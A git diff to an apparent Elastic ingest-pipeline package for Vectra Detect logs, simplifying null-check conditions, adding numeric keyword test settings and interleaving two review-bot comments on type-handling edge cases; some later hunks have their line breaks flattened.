diff --git a/packages/vectra_detect/data_stream/log/_dev/test/pipeline/test-common-config.yml b/packages/vectra_detect/data_stream/log/_dev/test/pipeline/test-common-config.yml
index b88e8f233be..d8ab55a55b3 100644
--- a/packages/vectra_detect/data_stream/log/_dev/test/pipeline/test-common-config.yml
+++ b/packages/vectra_detect/data_stream/log/_dev/test/pipeline/test-common-config.yml
@@ -9,3 +9,6 @@ fields:
 tags:
 - preserve_original_event
 - preserve_duplicate_custom_fields
+numeric_keyword_fields:
+ - vectra_detect.log.host.groups.id
+ - vectra_detect.log.host.groups.triage_filters.id
\ No newline at end of file
diff --git a/packages/vectra_detect/data_stream/log/_dev/test/system/test-tcp-config.yml b/packages/vectra_detect/data_stream/log/_dev/test/system/test-tcp-config.yml
index 300e0eb589a..ab9d670a404 100644
--- a/packages/vectra_detect/data_stream/log/_dev/test/system/test-tcp-config.yml
+++ b/packages/vectra_detect/data_stream/log/_dev/test/system/test-tcp-config.yml
@@ -7,3 +7,6 @@ data_stream:
 listen_port: 9025
 preserve_original_event: true
 preserve_duplicate_custom_fields: true
+numeric_keyword_fields:
+ - vectra_detect.log.host.groups.id
+ - vectra_detect.log.host.groups.triage_filters.id
\ No newline at end of file
diff --git a/packages/vectra_detect/data_stream/log/_dev/test/system/test-tls-config.yml b/packages/vectra_detect/data_stream/log/_dev/test/system/test-tls-config.yml
index 9095f53f86b..c104905f041 100644
--- a/packages/vectra_detect/data_stream/log/_dev/test/system/test-tls-config.yml
+++ b/packages/vectra_detect/data_stream/log/_dev/test/system/test-tls-config.yml
@@ -59,3 +59,6 @@ data_stream:
 -----END CERTIFICATE-----
 preserve_original_event: true
 preserve_duplicate_custom_fields: true
+numeric_keyword_fields:
+ - vectra_detect.log.host.groups.id
+ - vectra_detect.log.host.groups.triage_filters.id
\ No newline at end of file
diff --git a/packages/vectra_detect/data_stream/log/_dev/test/system/test-udp-config.yml b/packages/vectra_detect/data_stream/log/_dev/test/system/test-udp-config.yml
index 96a5085af49..769f35216e9 100644
--- a/packages/vectra_detect/data_stream/log/_dev/test/system/test-udp-config.yml
+++ b/packages/vectra_detect/data_stream/log/_dev/test/system/test-udp-config.yml
@@ -7,3 +7,6 @@ data_stream:
 listen_port: 9025
 preserve_original_event: true
 preserve_duplicate_custom_fields: true
+numeric_keyword_fields:
+ - vectra_detect.log.host.groups.id
+ - vectra_detect.log.host.groups.triage_filters.id
\ No newline at end of file
diff --git a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/default.yml
index bf140708d45..53214fb5ff1 100644
--- a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/default.yml
@@ -110,10 +110,10 @@ processors:
 ignore_empty_value: true
 - pipeline:
 name: '{{ IngestPipeline "pipeline-host-detection" }}'
- if: (ctx.vectra_detect?.log?.event_type == 'vectra_json_v2' || ctx.vectra_detect?.log?.event_type == 'vectra_json') && ctx.json?.category != 'HOST SCORING'
+ if: "['vectra_json_v2', 'vectra_json'].contains(ctx.vectra_detect?.log?.event_type) && ctx.json?.category != 'HOST SCORING'"
 - pipeline:
 name: '{{ IngestPipeline "pipeline-host-scoring" }}'
- if: (ctx.vectra_detect?.log?.event_type == 'vectra_json_v2' || ctx.vectra_detect?.log?.event_type == 'vectra_json') && ctx.json?.category == 'HOST SCORING'
+ if: "['vectra_json_v2', 'vectra_json'].contains(ctx.vectra_detect?.log?.event_type) && ctx.json?.category == 'HOST SCORING'"
 - pipeline:
 name: '{{ IngestPipeline "pipeline-account-scoring" }}'
 if: ctx.vectra_detect?.log?.event_type == 'vectra_json_account_v2'
@@ -146,9 +146,9 @@ processors:
 - remove:
 field: event.original
 ignore_missing: true
- if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))
+ if: ctx.tags?.contains('preserve_original_event') != true
 - remove:
- if: ctx.tags == null || !(ctx.tags.contains("preserve_duplicate_custom_fields"))
+ if: ctx.tags?.contains('preserve_duplicate_custom_fields') != true
 field:
 - vectra_detect.log.account.id
 - vectra_detect.log.account.name
diff --git a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-detection.yml b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-detection.yml
index bbd2798f7a4..8271fcd0b4d 100644
--- a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-detection.yml
+++ b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-detection.yml
@@ -47,7 +47,7 @@ processors:
 - json:
 field: json.service_info
 tag: 'json_to_split_service_info'
- if: ctx.json?.service_info != null && ctx.json.service_info instanceof String
+ if: ctx.json?.service_info instanceof String
 on_failure:
 - append:
 field: error.message
@@ -58,7 +58,7 @@ processors:
 ignore_missing: true
 - foreach:
 field: vectra_detect.log.service.info
- if: ctx.vectra_detect?.log?.service?.info != null && ctx.vectra_detect.log.service.info instanceof List
+ if: ctx.vectra_detect?.log?.service?.info instanceof List
 processor:
 convert:
 field: _ingest._value.count
@@ -72,7 +72,7 @@ processors:
 value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
 - foreach:
 field: vectra_detect.log.service.info
- if: ctx.vectra_detect?.log?.service?.info != null && ctx.vectra_detect.log.service.info instanceof List
+ if: ctx.vectra_detect?.log?.service?.info instanceof List
 ignore_missing: true
 processor:
 append:
@@ -81,7 +81,7 @@ processors:
 allow_duplicates: false
 - foreach:
 field: vectra_detect.log.service.info
- if: ctx.vectra_detect?.log?.service?.info != null && ctx.vectra_detect.log.service.info instanceof List
+ if: ctx.vectra_detect?.log?.service?.info instanceof List
 ignore_missing: true
 processor:
 remove:
@@ -104,7 +104,7 @@ processors:
 field: vectra_detect.log.account.uid
 tag: 'dissect_account_uid'
 pattern: '%{vectra_detect.log.account.user_id}@%{user.domain}'
- if: ctx.vectra_detect?.log?.account?.uid.contains('@')
+ if: ctx.vectra_detect?.log?.account?.uid?.contains('@') == true
 on_failure:
 - append:
 field: error.message
@@ -129,7 +129,7 @@ processors:
 - json:
 field: json.account_info
 tag: 'json_to_split_account_info'
- if: ctx.json?.account_info != null && ctx.json.account_info instanceof String
+ if: ctx.json?.account_info instanceof String
 on_failure:
 - append:
 field: error.message
@@ -140,7 +140,7 @@ processors:
 ignore_missing: true
 - foreach:
 field: vectra_detect.log.account.info
- if: ctx.vectra_detect?.log?.account?.info != null && ctx.vectra_detect.log.account.info instanceof List
+ if: ctx.vectra_detect?.log?.account?.info instanceof List
 processor:
 convert:
 field: _ingest._value.count
@@ -154,7 +154,7 @@ processors:
 value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
 - foreach:
 field: vectra_detect.log.account.info
- if: ctx.vectra_detect?.log?.account?.info != null && ctx.vectra_detect.log.account.info instanceof List
+ if: ctx.vectra_detect?.log?.account?.info instanceof List
 ignore_missing: true
 processor:
 append:
@@ -163,7 +163,7 @@ processors:
 allow_duplicates: false
 - foreach:
 field: vectra_detect.log.account.info
- if: ctx.vectra_detect?.log?.account?.info != null && ctx.vectra_detect.log.account.info instanceof List
+ if: ctx.vectra_detect?.log?.account?.info instanceof List
 ignore_missing: true
 processor:
 remove:
diff --git a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-lockdown.yml b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-lockdown.yml
index 59eeae4ebac..dc157ef6eb3 100644
--- a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-lockdown.yml
+++ b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-lockdown.yml
@@ -26,11 +26,11 @@ processors:
 - set:
 field: event.outcome
 value: success
- if: ctx.vectra_detect?.log?.success != null && ctx.vectra_detect.log.success
+ if: ctx.vectra_detect?.log?.success == true
 - set:
 field: event.outcome
 value: failure
- if: ctx.vectra_detect?.log?.success != null && !ctx.vectra_detect.log.success
+ if: ctx.vectra_detect?.log?.success == false
 - rename:
 field: json.href
 target_field: vectra_detect.log.href
diff --git a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-scoring.yml b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-scoring.yml
index 3ef2a04bf2b..cdea6ba7877 100644
--- a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-scoring.yml
+++ b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-account-scoring.yml
@@ -152,7 +152,7 @@ processors:
 - json:
 field: json.host_access_history
 tag: 'json_to_split_host_access_history'
- if: ctx.json?.host_access_history != null && ctx.json.host_access_history instanceof String
+ if: ctx.json?.host_access_history instanceof String
 on_failure:
 - append:
 field: error.message
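Review bot: `ctx.vectra_detect?.log?.success == true` and `== false` match only a JSON boolean; if `success` ever arrives as the string `"true"`/`"false"`, both `set` processors are skipped and `event.outcome` is silently left unset, whereas the removed form would most likely have raised a visible script error for that input. If the source can emit either form, a `convert` processor with `type: boolean` and `ignore_missing: true` on `vectra_detect.log.success` placed before these two `set` processors makes the comparison deterministic; whether string values occur cannot be confirmed from this chunk. The `@@ -32,11 +32,11 @@` hunk of pipeline-host-lockdown.yml has the same pattern.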
@@ -163,7 +163,7 @@ processors:
 ignore_missing: true
 - foreach:
 field: vectra_detect.log.host.access_history
- if: ctx.vectra_detect?.log?.host?.access_history != null && ctx.vectra_detect.log.host.access_history instanceof List
+ if: ctx.vectra_detect?.log?.host?.access_history instanceof List
 processor:
 convert:
 field: _ingest._value.id
@@ -176,7 +176,7 @@ processors:
 value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
 - foreach:
 field: vectra_detect.log.host.access_history
- if: ctx.vectra_detect?.log?.host?.access_history != null && ctx.vectra_detect.log.host.access_history instanceof List
+ if: ctx.vectra_detect?.log?.host?.access_history instanceof List
 processor:
 date:
 field: _ingest._value.lastSeen
@@ -186,7 +186,7 @@ processors:
 ignore_failure: true
 - foreach:
 field: vectra_detect.log.host.access_history
- if: ctx.vectra_detect?.log?.host?.access_history != null && ctx.vectra_detect.log.host.access_history instanceof List
+ if: ctx.vectra_detect?.log?.host?.access_history instanceof List
 processor:
 convert:
 field: _ingest._value.privilege
@@ -200,7 +200,7 @@ processors:
 value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
 - foreach:
 field: vectra_detect.log.host.access_history
- if: ctx.vectra_detect?.log?.host?.access_history != null && ctx.vectra_detect.log.host.access_history instanceof List
+ if: ctx.vectra_detect?.log?.host?.access_history instanceof List
 processor:
 rename:
 field: _ingest._value.privilegeCategory
@@ -208,7 +208,7 @@ processors:
 ignore_missing: true
 - foreach:
 field: vectra_detect.log.host.access_history
- if: ctx.vectra_detect?.log?.host?.access_history != null && ctx.vectra_detect.log.host.access_history instanceof List
+ if: ctx.vectra_detect?.log?.host?.access_history instanceof List
 processor:
 remove:
 field:
@@ -218,7 +218,7 @@ processors:
 - json:
 field: json.service_access_history
 tag: 'json_to_split_service_access_history'
- if: ctx.json?.service_access_history != null && ctx.json.service_access_history instanceof String
+ if: ctx.json?.service_access_history instanceof String
 on_failure:
 - append:
 field: error.message
@@ -229,7 +229,7 @@ processors:
 ignore_missing: true
 - foreach:
 field: vectra_detect.log.service.access_history
- if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List
+ if: ctx.vectra_detect?.log?.service?.access_history instanceof List
 processor:
 convert:
 field: _ingest._value.id
@@ -242,7 +242,7 @@ processors:
 value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
 - foreach:
 field: vectra_detect.log.service.access_history
- if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List
+ if: ctx.vectra_detect?.log?.service?.access_history instanceof List
 processor:
 date:
 field: _ingest._value.lastSeen
@@ -252,7 +252,7 @@ processors:
 ignore_failure: true
 - foreach:
 field: vectra_detect.log.service.access_history
- if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List
+ if: ctx.vectra_detect?.log?.service?.access_history instanceof List
 processor:
 convert:
 field: _ingest._value.privilege
@@ -266,7 +266,7 @@ processors:
 value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
 - foreach:
 field: vectra_detect.log.service.access_history
- if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List
+ if: ctx.vectra_detect?.log?.service?.access_history instanceof List
 processor:
 rename:
 field: _ingest._value.privilegeCategory
@@ -274,7 +274,7 @@ processors:
 ignore_missing: true
 - foreach:
 field: vectra_detect.log.service.access_history
- if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List
+ if: ctx.vectra_detect?.log?.service?.access_history instanceof List
 ignore_missing: true
 processor:
 append:
@@ -283,7 +283,7 @@ processors:
 allow_duplicates: false
 - foreach:
 field: vectra_detect.log.service.access_history
- if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List
+ if: ctx.vectra_detect?.log?.service?.access_history instanceof List
 processor:
 remove:
 field:
diff --git a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-audit.yml b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-audit.yml
index 35ef3b18b46..286ade2e27c 100644
--- a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-audit.yml
+++ b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-audit.yml
@@ -8,22 +8,22 @@ processors:
 field: event.category
 value: session
 allow_duplicates: false
- if: ctx.json?.message != null && ctx.json.message.contains('session')
+ if: ctx.json?.message?.contains('session') == true
 - append:
 field: event.category
 value: authentication
 allow_duplicates: false
- if: ctx.json?.message != null && (ctx.json.message.contains('authentication') || ctx.json.message.contains('log in'))
+ if: ctx.json?.message?.contains('authentication') == true || ctx.json?.message?.contains('log in') == true
 - append:
 field: event.category
 value: configuration
 allow_duplicates: false
- if: ctx.json?.message != null && ctx.json.message.contains('configuration')
+ if: ctx.json?.message?.contains('configuration') == true
 - append:
 field: event.type
 value: end
 allow_duplicates: false
- if: ctx.json?.message != null && (ctx.json.message.contains('timeout') || ctx.json.message.contains('log in'))
+ if: ctx.json?.message?.contains('timeout') == true || ctx.json?.message?.contains('log in') == true
 - rename:
 field: json.result
 target_field: vectra_detect.log.result
@@ -31,15 +31,15 @@ processors:
 - set:
 field: event.outcome
 value: success
- if: ctx.vectra_detect?.log?.result != null && ['success', 'true'].contains(ctx.vectra_detect.log.result.toLowerCase())
+ if: "'success'.equalsIgnoreCase(ctx.vectra_detect?.log?.result) || 'true'.equalsIgnoreCase(ctx.vectra_detect?.log?.result)"
 - set:
 field: event.outcome
 value: failure
- if: ctx.vectra_detect?.log?.result != null && ['failure', 'false'].contains(ctx.vectra_detect.log.result.toLowerCase())
+ if: "'failure'.equalsIgnoreCase(ctx.vectra_detect?.log?.result) || 'false'.equalsIgnoreCase(ctx.vectra_detect?.log?.result)"
 - set:
 field: event.outcome
 value: unknown
- if: ctx.vectra_detect?.log?.result != null && ['pending'].contains(ctx.vectra_detect.log.result.toLowerCase())
+ if: "'pending'.equalsIgnoreCase(ctx.vectra_detect?.log?.result)"
 - rename:
 field: json.dvchost
 target_field: vectra_detect.log.dvchost
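Review bot: `'success'.equalsIgnoreCase(ctx.vectra_detect?.log?.result)` handles a missing `result` (Java returns false for a null argument) but not a non-string one: if the field arrives as a boolean or number the argument cast fails at runtime and the `set` step errors, which is the same failure mode the removed `.toLowerCase()` call had. If non-string values are possible, guard each of the three conditions with `ctx.vectra_detect?.log?.result instanceof String &&` or convert the field to string first. As before, any value other than the five listed literals leaves `event.outcome` unset.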
diff --git a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-detection.yml b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-detection.yml
index ce69f09d3e4..2d99cd3d380 100644
--- a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-detection.yml
+++ b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-detection.yml
@@ -578,7 +578,7 @@ processors:
 - json:
 field: json.service_info
 tag: 'json_to_split_service_info'
- if: ctx.json?.service_info != null && ctx.json.service_info instanceof String
+ if: ctx.json?.service_info instanceof String
 on_failure:
 - append:
 field: error.message
@@ -589,7 +589,7 @@ processors:
 ignore_missing: true
 - foreach:
 field: vectra_detect.log.service.info
- if: ctx.vectra_detect?.log?.service?.info != null && ctx.vectra_detect.log.service.info instanceof List
+ if: ctx.vectra_detect?.log?.service?.info instanceof List
 processor:
 convert:
 field: _ingest._value.count
@@ -603,7 +603,7 @@ processors:
 value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
 - foreach:
 field: vectra_detect.log.service.info
- if: ctx.vectra_detect?.log?.service?.info != null && ctx.vectra_detect.log.service.info instanceof List
+ if: ctx.vectra_detect?.log?.service?.info instanceof List
 ignore_missing: true
 processor:
 append:
@@ -612,7 +612,7 @@ processors:
 allow_duplicates: false
 - foreach:
 field: vectra_detect.log.service.info
- if: ctx.vectra_detect?.log?.service?.info != null && ctx.vectra_detect.log.service.info instanceof List
+ if: ctx.vectra_detect?.log?.service?.info instanceof List
 ignore_missing: true
 processor:
 remove:
@@ -622,7 +622,7 @@ processors:
 - json:
 field: json.account_info
 tag: 'json_to_split_account_info'
- if: ctx.json?.account_info != null && ctx.json.account_info instanceof String
+ if: ctx.json?.account_info instanceof String
 on_failure:
 - append:
 field: error.message
@@ -633,7 +633,7 @@ processors:
 ignore_missing: true
 - foreach:
 field: vectra_detect.log.account.info
- if: ctx.vectra_detect?.log?.account?.info != null && ctx.vectra_detect.log.account.info instanceof List
+ if: ctx.vectra_detect?.log?.account?.info instanceof List
 processor:
 convert:
 field: _ingest._value.count
@@ -647,7 +647,7 @@ processors:
 value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
 - foreach:
 field: vectra_detect.log.account.info
- if: ctx.vectra_detect?.log?.account?.info != null && ctx.vectra_detect.log.account.info instanceof List
+ if: ctx.vectra_detect?.log?.account?.info instanceof List
 ignore_missing: true
 processor:
 append:
@@ -656,7 +656,7 @@ processors:
 allow_duplicates: false
 - foreach:
 field: vectra_detect.log.account.info
- if: ctx.vectra_detect?.log?.account?.info != null && ctx.vectra_detect.log.account.info instanceof List
+ if: ctx.vectra_detect?.log?.account?.info instanceof List
 ignore_missing: true
 processor:
 remove:
diff --git a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-lockdown.yml b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-lockdown.yml
index f4fb4663c82..f9c21393f67 100644
--- a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-lockdown.yml
+++ b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-lockdown.yml
@@ -32,11 +32,11 @@ processors:
 - set:
 field: event.outcome
 value: success
- if: ctx.vectra_detect?.log?.success != null && ctx.vectra_detect.log.success
+ if: ctx.vectra_detect?.log?.success == true
 - set:
 field: event.outcome
 value: failure
- if: ctx.vectra_detect?.log?.success != null && !ctx.vectra_detect.log.success
+ if: ctx.vectra_detect?.log?.success == false
 - rename:
 field: json.host_name
 target_field: vectra_detect.log.host.name
diff --git a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-scoring.yml b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-scoring.yml
index 5b83ab95c3a..7eacf6202e4 100644
--- a/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-scoring.yml
+++ b/packages/vectra_detect/data_stream/log/elasticsearch/ingest_pipeline/pipeline-host-scoring.yml
@@ -51,14 +51,14 @@ processors:
 - json:
 field: json.host_groups
 tag: 'json_to_split_host_groups'
- if: ctx.json?.host_groups != null && ctx.json.host_groups instanceof String
+ if: ctx.json?.host_groups instanceof String
 on_failure:
 - append:
 field: error.message
 value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
 - foreach:
 field: json.host_groups
- if: ctx.json?.host_groups != null && ctx.json.host_groups instanceof List
+ if: ctx.json?.host_groups instanceof List
 processor:
 rename:
 field: _ingest._value.groupType
@@ -66,7 +66,7 @@ processors:
 ignore_missing: true
 - foreach:
 field: json.host_groups
- if: ctx.json?.host_groups != null && ctx.json.host_groups instanceof List
+ if: ctx.json?.host_groups instanceof List
 processor:
 rename:
 field: _ingest._value.lastModifiedBy
@@ -74,7 +74,7 @@ processors: ignore_missing: true - foreach: field: json.host_groups - if: ctx.json?.host_groups != null && ctx.json.host_groups instanceof List + if: ctx.json?.host_groups instanceof List processor: foreach: field: _ingest._value.triageFilters @@ -86,7 +86,7 @@ processors: ignore_missing: true - foreach: field: json.host_groups - if: ctx.json?.host_groups != null && ctx.json.host_groups instanceof List + if: ctx.json?.host_groups instanceof List processor: rename: field: _ingest._value.triageFilters @@ -94,7 +94,7 @@ processors: ignore_missing: true - foreach: field: json.host_groups - if: ctx.json?.host_groups != null && ctx.json.host_groups instanceof List + if: ctx.json?.host_groups instanceof List processor: convert: field: _ingest._value.cognitoManaged @@ -108,7 +108,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: json.host_groups - if: ctx.json?.host_groups != null && ctx.json.host_groups instanceof List + if: ctx.json?.host_groups instanceof List processor: convert: field: _ingest._value.canEdit @@ -122,7 +122,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: json.host_groups - if: ctx.json?.host_groups != null && ctx.json.host_groups instanceof List + if: ctx.json?.host_groups instanceof List processor: convert: field: _ingest._value.canDelete 
@@ -136,7 +136,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: json.host_groups - if: ctx.json?.host_groups != null && ctx.json.host_groups instanceof List + if: ctx.json?.host_groups instanceof List processor: date: field: _ingest._value.lastModified @@ -146,7 +146,7 @@ processors: ignore_failure: true - foreach: field: json.host_groups - if: ctx.json?.host_groups != null && ctx.json.host_groups instanceof List + if: ctx.json?.host_groups instanceof List processor: convert: field: _ingest._value.filterCount @@ -160,7 +160,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: json.host_groups - if: ctx.json?.host_groups != null && ctx.json.host_groups instanceof List + if: ctx.json?.host_groups instanceof List processor: remove: field: @@ -344,7 +344,7 @@ processors: - json: field: json.detection_profile tag: 'json_to_split_detection_profile' - if: ctx.json?.detection_profile != null && ctx.json.detection_profile instanceof String + if: ctx.json?.detection_profile instanceof String on_failure: - append: field: error.message @@ -360,7 +360,7 @@ processors: - json: field: json.account_access_history tag: 'json_to_split_account_access_history' - if: ctx.json?.account_access_history != null && ctx.json.account_access_history instanceof String + if: ctx.json?.account_access_history instanceof String on_failure: - append: field: error.message 
@@ -371,7 +371,7 @@ processors: ignore_missing: true - foreach: field: vectra_detect.log.account.access_history - if: ctx.vectra_detect?.log?.account?.access_history != null && ctx.vectra_detect.log.account.access_history instanceof List + if: ctx.vectra_detect?.log?.account?.access_history instanceof List processor: convert: field: _ingest._value.id @@ -384,7 +384,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: vectra_detect.log.account.access_history - if: ctx.vectra_detect?.log?.account?.access_history != null && ctx.vectra_detect.log.account.access_history instanceof List + if: ctx.vectra_detect?.log?.account?.access_history instanceof List processor: date: field: _ingest._value.lastSeen @@ -394,7 +394,7 @@ processors: ignore_failure: true - foreach: field: vectra_detect.log.account.access_history - if: ctx.vectra_detect?.log?.account?.access_history != null && ctx.vectra_detect.log.account.access_history instanceof List + if: ctx.vectra_detect?.log?.account?.access_history instanceof List processor: convert: field: _ingest._value.privilege @@ -408,7 +408,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: vectra_detect.log.account.access_history - if: ctx.vectra_detect?.log?.account?.access_history != null && ctx.vectra_detect.log.account.access_history instanceof List + if: ctx.vectra_detect?.log?.account?.access_history instanceof List processor: rename: field: _ingest._value.privilegeCategory 
@@ -416,7 +416,7 @@ processors: ignore_missing: true - foreach: field: vectra_detect.log.account.access_history - if: ctx.vectra_detect?.log?.account?.access_history != null && ctx.vectra_detect.log.account.access_history instanceof List + if: ctx.vectra_detect?.log?.account?.access_history instanceof List ignore_missing: true processor: append: @@ -425,7 +425,7 @@ processors: allow_duplicates: false - foreach: field: vectra_detect.log.account.access_history - if: ctx.vectra_detect?.log?.account?.access_history != null && ctx.vectra_detect.log.account.access_history instanceof List + if: ctx.vectra_detect?.log?.account?.access_history instanceof List processor: remove: field: @@ -435,7 +435,7 @@ processors: - json: field: json.service_access_history tag: 'json_to_split_service_access_history' - if: ctx.json?.service_access_history != null && ctx.json.service_access_history instanceof String + if: ctx.json?.service_access_history instanceof String on_failure: - append: field: error.message @@ -446,7 +446,7 @@ processors: ignore_missing: true - foreach: field: vectra_detect.log.service.access_history - if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List + if: ctx.vectra_detect?.log?.service?.access_history instanceof List processor: convert: field: _ingest._value.id @@ -459,7 +459,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: vectra_detect.log.service.access_history - if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List + if: ctx.vectra_detect?.log?.service?.access_history instanceof List processor: date: field: _ingest._value.lastSeen 
@@ -469,7 +469,7 @@ processors: ignore_failure: true - foreach: field: vectra_detect.log.service.access_history - if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List + if: ctx.vectra_detect?.log?.service?.access_history instanceof List processor: convert: field: _ingest._value.privilege @@ -483,7 +483,7 @@ processors: value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - foreach: field: vectra_detect.log.service.access_history - if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List + if: ctx.vectra_detect?.log?.service?.access_history instanceof List processor: rename: field: _ingest._value.privilegeCategory @@ -491,7 +491,7 @@ processors: ignore_missing: true - foreach: field: vectra_detect.log.service.access_history - if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List + if: ctx.vectra_detect?.log?.service?.access_history instanceof List ignore_missing: true processor: append: @@ -500,7 +500,7 @@ processors: allow_duplicates: false - foreach: field: vectra_detect.log.service.access_history - if: ctx.vectra_detect?.log?.service?.access_history != null && ctx.vectra_detect.log.service.access_history instanceof List + if: ctx.vectra_detect?.log?.service?.access_history instanceof List processor: remove: field: diff --git a/packages/vectra_detect/manifest.yml b/packages/vectra_detect/manifest.yml index 1bedcc3cac5..22cc96ebfea 100644 --- a/packages/vectra_detect/manifest.yml +++ b/packages/vectra_detect/manifest.yml 
